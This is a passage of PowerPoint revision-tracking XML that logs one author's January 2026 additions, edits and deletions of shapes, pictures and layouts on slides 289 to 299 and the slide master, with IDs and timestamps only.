      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:59.404" v="4254"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2580204092" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:10:52.598" v="2934" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2580204092" sldId="289"/>
            <ac:spMk id="6" creationId="{4327A924-7324-3C6D-C4A5-96E09364D7D0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:59.404" v="4254"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2580204092" sldId="289"/>
            <ac:spMk id="8" creationId="{8823546F-2EE1-BACD-0F13-12755721B1BA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:12:37.453" v="2946" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2580204092" sldId="289"/>
            <ac:picMk id="7" creationId="{4BAA0DC7-0295-E1A2-1C09-2B8BE96C2B46}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:01.661" v="4255"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4291678866" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:01.661" v="4255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4291678866" sldId="290"/>
            <ac:spMk id="11" creationId="{896825AF-0A63-E432-5E0A-2842D9727911}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:18:12.084" v="2952" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4291678866" sldId="290"/>
            <ac:picMk id="8" creationId="{EC5D6D97-719F-F842-D6D1-D44B79C259EE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:18:30.474" v="2958" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4291678866" sldId="290"/>
            <ac:picMk id="10" creationId="{057D5D34-CBD6-573B-D8BA-19A53536F1FA}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:03.973" v="4256"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="953338229" sldId="291"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:03.973" v="4256"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="953338229" sldId="291"/>
            <ac:spMk id="5" creationId="{80D0ED41-DB12-4E3A-6DE4-E01F0EB6D32B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:13.101" v="4258"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2113444465" sldId="292"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:16:52.623" v="2963" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113444465" sldId="292"/>
            <ac:spMk id="6" creationId="{40E05193-2FF7-71C9-67EF-8BFA2D9813A0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:18:39.944" v="2970" actId="767"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113444465" sldId="292"/>
            <ac:spMk id="8" creationId="{1537E8EE-9A31-8F1F-3F1B-2F4D02415B8B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:19:48.095" v="3003" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113444465" sldId="292"/>
            <ac:spMk id="9" creationId="{0F31F7EA-6DC0-6B37-A191-3FB02D6FAC03}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:13.101" v="4258"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113444465" sldId="292"/>
            <ac:spMk id="10" creationId="{597D25CB-EDF4-101B-9F45-A1231128B0EE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:17:30.383" v="2968" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2113444465" sldId="292"/>
            <ac:picMk id="7" creationId="{EEC3B0EA-E30A-C9B3-08AE-B5D2C531320B}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:10.453" v="4257"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1974698318" sldId="293"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:10.453" v="4257"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1974698318" sldId="293"/>
            <ac:spMk id="5" creationId="{D8FA3E1E-72D9-825E-FF04-AE6997463920}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:27:51.815" v="3160" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1974698318" sldId="293"/>
            <ac:spMk id="6" creationId="{FBDA219B-CD7C-6D08-5DDC-CACDAC78A0E9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:31:43.953" v="4340" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="832351477" sldId="294"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:30:19.033" v="3229" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="832351477" sldId="294"/>
            <ac:spMk id="3" creationId="{F0C5BBFA-9B6B-D511-0C86-5B7DE0BA5D70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:15.692" v="4259"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="832351477" sldId="294"/>
            <ac:spMk id="5" creationId="{E98D7CB8-56B1-2F0A-503F-5225373FFF30}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T15:09:44.391" v="3903" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="832351477" sldId="294"/>
            <ac:spMk id="6" creationId="{3393AA25-B214-EBA5-B533-DBBE1D2B8CB6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:31:43.953" v="4340" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="832351477" sldId="294"/>
            <ac:picMk id="8" creationId="{CB0BE432-3115-6A68-A897-E0946721D1D5}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:32:44.609" v="4346" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2502528691" sldId="295"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T14:41:26.803" v="3624" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2502528691" sldId="295"/>
            <ac:spMk id="3" creationId="{C81D41B7-1163-FB21-C003-E2F9DE53389B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:18.197" v="4260"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2502528691" sldId="295"/>
            <ac:spMk id="5" creationId="{07228E68-DBBF-B6E6-147F-BD1DD02AA6AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:32:44.609" v="4346" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2502528691" sldId="295"/>
            <ac:spMk id="6" creationId="{64C35A1F-82CE-FCC2-A90A-A1C9A9372D50}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:32:39.935" v="4344" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2502528691" sldId="295"/>
            <ac:picMk id="8" creationId="{691EDF8C-6FF7-4EC7-482D-A241877871D6}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:20.892" v="4261"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="148611062" sldId="296"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T15:08:20.615" v="3838" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="148611062" sldId="296"/>
            <ac:spMk id="3" creationId="{9F131A9E-9D7E-EB57-F696-4FCA13210752}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:20.892" v="4261"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="148611062" sldId="296"/>
            <ac:spMk id="5" creationId="{E89610BB-4446-6432-3036-F62B5F08C92D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:09:56.382" v="4079" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="148611062" sldId="296"/>
            <ac:spMk id="6" creationId="{319BF697-7319-DB9B-E42F-610FC5840246}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod modTransition delAnim modAnim">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T13:28:13.377" v="4381" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2386769194" sldId="297"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:50:37.744" v="4377" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2386769194" sldId="297"/>
            <ac:spMk id="3" creationId="{E0FC7555-08FF-E8E0-49D3-D33142078AC8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:41:22.925" v="4262"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2386769194" sldId="297"/>
            <ac:spMk id="5" creationId="{B517E828-3EF4-CBC9-F905-C84A0B8D3C48}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:50:29.848" v="4376" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2386769194" sldId="297"/>
            <ac:spMk id="6" creationId="{A3E28914-7E48-A315-5F5B-D2A989094EB4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T13:28:09.217" v="4380" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2386769194" sldId="297"/>
            <ac:picMk id="7" creationId="{8E35841E-B45C-8096-5295-F922097B6DA0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:40:56.009" v="4274" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1537072728" sldId="298"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:21:42.681" v="4175" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1537072728" sldId="298"/>
            <ac:spMk id="3" creationId="{457309ED-62F7-A65D-FF9C-5939AB88082C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:21:46.577" v="4176" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1537072728" sldId="298"/>
            <ac:spMk id="6" creationId="{8E7F06F6-042C-D24B-E1A8-D6669247E22A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:40:56.009" v="4274" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1537072728" sldId="298"/>
            <ac:picMk id="7" creationId="{7CABD499-85A0-E961-2017-4EBA6F5899CB}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:43:03.303" v="4336" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="166390166" sldId="299"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:43:03.303" v="4336" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="166390166" sldId="299"/>
            <ac:spMk id="3" creationId="{08D2DD84-D5FC-2BD2-9D18-53DB936E8150}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:41:04.014" v="4276" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="166390166" sldId="299"/>
            <ac:spMk id="6" creationId="{CD0D3F73-9E98-592A-C009-8452861671B1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:42:31.783" v="4322" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="166390166" sldId="299"/>
            <ac:picMk id="7" creationId="{79B12449-A65C-70BC-F6EC-B5FC2FA3EBF3}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T22:42:29.423" v="4321" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="166390166" sldId="299"/>
            <ac:picMk id="9" creationId="{DF4E25BB-D86B-F1A2-C778-128F97B8948A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:23:43.094" v="4178" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4014146883" sldId="299"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldMasterChg chg="modTransition modSldLayout">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:37:23.077" v="4202" actId="121"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="0" sldId="2147483648"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="addSp delSp modSp mod modTransition">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:37:23.077" v="4202" actId="121"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="0" sldId="2147483648"/>
            <pc:sldLayoutMk cId="0" sldId="2147483649"/>
          </pc:sldLayoutMkLst>
          <pc:spChg chg="add del mod">
            <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:36:48.539" v="4188"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="0" sldId="2147483649"/>
              <ac:spMk id="2" creationId="{F8ADC2BE-773D-B7BC-36C4-1F320F1DB192}"/>
            </ac:spMkLst>
          </pc:spChg>
          <pc:spChg chg="add mod">
            <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:37:23.077" v="4202" actId="121"/>
            <ac:spMkLst>
              <pc:docMk/>
              <pc:sldMasterMk cId="0" sldId="2147483648"/>
              <pc:sldLayoutMk cId="0" sldId="2147483649"/>
              <ac:spMk id="3" creationId="{F07A750C-70E7-9C7D-6A32-CBB336A8FBD9}"/>
            </ac:spMkLst>
          </pc:spChg>
        </pc:sldLayoutChg>
      </pc:sldMasterChg>
      <pc:sldMasterChg chg="new del mod addSldLayout delSldLayout">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
        <pc:sldMasterMkLst>
          <pc:docMk/>
          <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
        </pc:sldMasterMkLst>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="3238619689" sldId="2147483651"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="741324786" sldId="2147483652"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="4266256856" sldId="2147483653"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="3634560932" sldId="2147483654"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="3447613846" sldId="2147483655"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="4231255015" sldId="2147483656"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="2284298632" sldId="2147483657"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="520671411" sldId="2147483658"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
          <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:38:03.090" v="4204" actId="6938"/>
          <pc:sldLayoutMkLst>
            <pc:docMk/>
            <pc:sldMasterMk cId="1169704593" sldId="2147483650"/>
            <pc:sldLayoutMk cId="2457086187" sldId="2147483659"/>
          </pc:sldLayoutMkLst>
        </pc:sldLayoutChg>
        <pc:sldLayoutChg chg="new del replId">
